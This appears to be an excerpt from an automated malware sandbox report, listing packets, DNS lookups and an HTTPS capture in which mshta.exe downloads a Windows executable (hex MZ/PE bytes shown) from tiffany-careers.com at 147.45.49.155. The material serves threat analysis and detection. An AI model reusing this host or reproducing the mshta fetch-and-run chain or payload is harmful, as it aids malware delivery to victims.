                                                                        Dec 27, 2024 09:05:41.177535057 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.177542925 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.177594900 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.247006893 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.247031927 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.247101068 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.247131109 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.247150898 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.247174978 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.331521988 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.331551075 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.331610918 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.331635952 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.331655025 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.331682920 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.336267948 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.336287975 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.336339951 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.336366892 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.336390018 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.336457968 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.342272043 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.342291117 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.342408895 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.342417002 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.342454910 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.348411083 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.348433018 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.348495007 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.348501921 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.348556042 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.353818893 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.353836060 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.353904009 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.353912115 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.353972912 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.360111952 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.360127926 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.360212088 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.360219955 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.360260963 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.365449905 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.365466118 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.365542889 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.365550995 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.365596056 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.439352036 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.439378023 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.439445972 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.439491034 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.439508915 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.439537048 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.523555040 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.523578882 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.523710012 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.523745060 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.523797989 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.528312922 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.528331041 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.528387070 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.528399944 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.528446913 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.534301043 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.534317017 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.534369946 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.534383059 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.534430027 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.540365934 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.540384054 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.540447950 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.540462971 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.540488005 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.540503979 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.545312881 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.545330048 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.545386076 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.545398951 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.545440912 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.552406073 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.552427053 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.552526951 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.552539110 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.552577972 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.557461977 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.557485104 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.557543993 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.557552099 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.557588100 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.557604074 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.631074905 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.631102085 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.631160975 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.631179094 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.631197929 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.631217003 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.716346025 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.716372967 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.716450930 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.716487885 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.716506004 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.717036009 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.720321894 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.720343113 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.720407963 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.720424891 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.720464945 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.726125956 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.726146936 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.726195097 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.726210117 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.726231098 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.726244926 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.732475042 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.732491016 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.732536077 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.732543945 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.732569933 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.732584953 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.737654924 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.737674952 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.737725019 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.737736940 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.737773895 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.743117094 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.743133068 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.743182898 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.743191957 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.743220091 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.743235111 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.748214006 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.748229980 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.748276949 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.748285055 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.748313904 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.823281050 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.823303938 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.823348999 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.823376894 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.823395014 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.823412895 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.907753944 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.907778025 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.907829046 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.907840967 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.907859087 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.907876968 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.913043976 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.913062096 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.913119078 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.913125992 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.913170099 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.918639898 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.918658018 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.918694019 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.918699026 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.918720961 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.918736935 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.924355984 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.924372911 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.924415112 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.924421072 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.924453974 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.930032015 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.930048943 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.930087090 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.930093050 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.930109024 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.930123091 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.934485912 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.934516907 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.934544086 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.934550047 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.934587002 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.940246105 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.940274000 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.940309048 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.940315962 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.940342903 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.940359116 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.015296936 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.015327930 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.015377045 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.015403986 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.015415907 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.015630007 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.099946976 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.099975109 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.100030899 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.100080013 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.100097895 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.100135088 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.105032921 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.105050087 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.105115891 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.105130911 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.105171919 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.110068083 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.110085964 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.110126972 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.110173941 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.110179901 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.110286951 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.115650892 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.115667105 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.115722895 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.115732908 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.115771055 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.121351004 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.121367931 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.121426105 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.121434927 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.121475935 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.126648903 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.126665115 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.126717091 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.126734972 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.126775980 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.132328033 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.132344007 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.132425070 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.132435083 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.132477045 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.207719088 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.207746029 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.207794905 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.207820892 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.207833052 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.207887888 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.291949987 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.291977882 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.292038918 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.292076111 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.292089939 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.292279959 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.296756983 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.296775103 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.296838045 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.296847105 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.296891928 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.297571898 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.297625065 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.297631025 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.297646999 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:42.297739983 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:42.298213005 CET49729443192.168.2.8147.45.49.155

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 27, 2024 09:05:15.194235086 CET6281853192.168.2.81.1.1.1
                                                                        Dec 27, 2024 09:05:15.512497902 CET53628181.1.1.1192.168.2.8
                                                                        Dec 27, 2024 09:05:35.292830944 CET4957953192.168.2.81.1.1.1
                                                                        Dec 27, 2024 09:05:45.570933104 CET6197453192.168.2.81.1.1.1
                                                                        Dec 27, 2024 09:05:45.792874098 CET53619741.1.1.1192.168.2.8
                                                                        Dec 27, 2024 09:06:04.424026966 CET6127753192.168.2.81.1.1.1
                                                                        Dec 27, 2024 09:06:04.562596083 CET53612771.1.1.1192.168.2.8
                                                                        Dec 27, 2024 09:06:04.954224110 CET6028853192.168.2.81.1.1.1
                                                                        Dec 27, 2024 09:06:05.093890905 CET53602881.1.1.1192.168.2.8

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 27, 2024 09:05:15.194235086 CET192.168.2.81.1.1.10xfee3Standard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:05:35.292830944 CET192.168.2.81.1.1.10x378eStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:05:45.570933104 CET192.168.2.81.1.1.10xa3f3Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:06:04.424026966 CET192.168.2.81.1.1.10xfbc0Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:06:04.954224110 CET192.168.2.81.1.1.10x8d95Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 27, 2024 09:05:15.512497902 CET1.1.1.1192.168.2.80xfee3No error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:05:28.714724064 CET1.1.1.1192.168.2.80xbcNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:05:28.714724064 CET1.1.1.1192.168.2.80xbcNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:05:35.586566925 CET1.1.1.1192.168.2.80x378eNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 27, 2024 09:05:45.792874098 CET1.1.1.1192.168.2.80xa3f3Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:06:04.562596083 CET1.1.1.1192.168.2.80xfbc0Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:06:05.093890905 CET1.1.1.1192.168.2.80x8d95Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:06:36.325066090 CET1.1.1.1192.168.2.80xcba8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                        Dec 27, 2024 09:06:36.325066090 CET1.1.1.1192.168.2.80xcba8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • tiffany-careers.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.849705147.45.49.1554438084C:\Windows\System32\mshta.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-27 08:05:17 UTC333OUTGET /ghep2412_2 HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                        Host: tiffany-careers.com
                                                                        Connection: Keep-Alive
                                                                        2024-12-27 08:05:17 UTC397INHTTP/1.1 200 OK
                                                                        etag: "6bc77-676a8e87-23c55;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:35:51 GMT
                                                                        content-length: 441463
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:17 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
                                                                        2024-12-27 08:05:17 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
